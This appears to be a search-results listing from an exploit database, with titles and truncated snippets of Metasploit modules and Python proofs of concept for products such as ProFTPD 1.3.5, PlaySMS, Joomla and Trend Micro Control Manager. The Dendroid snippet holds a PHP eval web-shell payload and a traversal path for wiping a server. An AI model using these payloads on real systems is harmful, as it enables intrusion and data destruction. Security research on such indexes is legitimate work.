122 matches found
Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload
Samsung NVR Recorder SRN-1670D is a high performance network video recorder. An arbitrary file upload vulnerability was found in the Web Viewer component, which could allow an authenticated user to upload a PHP payload to get code execution. Recent assessments: jvazquez-r7 at September 12, 2019...
Trend Micro Control Manager - ImportFile Directory Traversal RCE Exploit
Exploit for windows platform in category remote exploits require 'msf/core' require 'msf/core/exploit/phpexe' class MetasploitModule 'Trend Micro Control Manager importFile Directory Traversal RCE', 'Description' = %q This module exploits a directory traversal vulnerability found in Trend Micro...
Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)
Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution Metasploit require 'msf/core' require 'msf/core/exploit/phpexe' class MetasploitModule 'Trend Micro Control Manager importFile Directory Traversal RCE', 'Description' = %q This module exploits a directory traversal...
PlaySMS 1.4 - Remote Code Execution Vulnerability
Exploit for php platform in category web applications Exploit Title: PlaySMS 1.4 Remote Code Execution to Poisoning admin log Date: 19-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website:...
PlaySMS 1.4 - Remote Code Execution
PlaySMS 1.4 - Remote Code Execution Exploit Title: PlaySMS 1.4 Remote Code Execution to Poisoning admin log Date: 19-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/...
Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution
''' Simple PoC for Joomla Object Injection. Gary @ Sec-1 ltd http://www.sec-1.com/ ''' import requests easyinstall requests def geturlurl, useragent: headers = 'User-Agent': useragent cookies = requests.geturl,headers=headers.cookies for in range3: response = requests.geturl,...
Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload', 'Description' = %q This module exploits an arbitrary file...
Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload
This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading to arbitrary code execution. Although the vendor fixed Up.Time to prevent this...
Dendroid botnet Remote Code Execution Vulnerability
Bonus to remotely wipe the whole server: /deletepics.php?uid=../../Panel/ import requests Add URL Set a PHP payload Go to http://website/config.php URL = 'http://localhost/Panel/applysettings.php' PAYLOAD = "isset$GET'tapz' ? eval$GET'tapz' : '" data = 'dbhost' : 'localhost', 'dbname' : 'dendroid...
ProFTPD 1.3.5 Mod_Copy Command Execution Exploit
This Metasploit module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by defau...
ProFTPD 1.3.5 Mod_Copy Command Execution
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'ProFTPD 1.3.5 ModCopy Command Execution', 'Description' = %q This module exploits the SITE CPFR/CPTO commands in ProFTPD version...
ProFTPd 1.3.5 - mod_copy Remote Command Execution
ProFTPd 1.3.5 - modcopy Remote Command Execution Title: ProFTPd 1.3.5 Remote Command Execution Date : 20/04/2015 Author: R-73eN Software: ProFTPd 1.3.5 with modcopy Tested : Kali Linux 1.06 CVE : 2015-3306 Greetz to Vadim Melihow for all the hard work . import socket import sys import requests...
ProFTPd 1.3.5 Remote Command Execution
Title: ProFTPd 1.3.5 Remote Command Execution Date : 20/04/2015 Author: R-73eN Software: ProFTPd 1.3.5 with modcopy Tested : Kali Linux 1.06 CVE : 2015-3306 Greetz to Vadim Melihow for all the hard work . import socket import sys import requests Banner banner = "" banner += " \n" banner +=" | | /...
ProFTPd 1.3.5 - Remote Command Execution Exploit
Exploit for linux platform in category remote exploits Title: ProFTPd 1.3.5 Remote Command Execution Date : 20/04/2015 Author: R-73eN Software: ProFTPd 1.3.5 with modcopy Tested : Kali Linux 1.06 CVE : 2015-3306 Greetz to Vadim Melihow for all the hard work . import socket import sys import...
X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'X7 Chat 2.0.5 lib/message.php pregreplace PHP Code Execution', 'Description' = %q This module exploits a post-auth vulnerability fou...
The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution
No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initializeinfo = superupdateinfoinfo, 'Name' = 'The Uploader 2.0.4 Eng/Ita Remote File Upload', 'Description'= %q This module exploits...
Kimai 0.9.2 - 'db_restore.php' SQL Injection
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient include...
OpenX Backdoor PHP Code Execution
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3...
Simple E-Document Arbitrary File Upload
This module exploits a file upload vulnerability found in Simple E-Document versions 3.0 to 3.1. Attackers can bypass authentication and abuse the upload feature in order to upload malicious PHP files which results in arbitrary remote code execution as the web server user. File uploads are disabl...
PhotoStore 4.0.7. Shell Upload
. \ /| | \ \ \ \ | | | | / \ / \ /\ / \ / / / / / \ /\ / \ / / / | | | Y \ / \ | | \ /\ \ \ | | /\ /\ / || || /\ \ /|| / /// \ /|| \ // / / / / / / http://tcc.sch.id Exploit title : PhotoStore 4.0.7 shell upload Author : Gabby Dork : use ur brain ; Vendor Site :...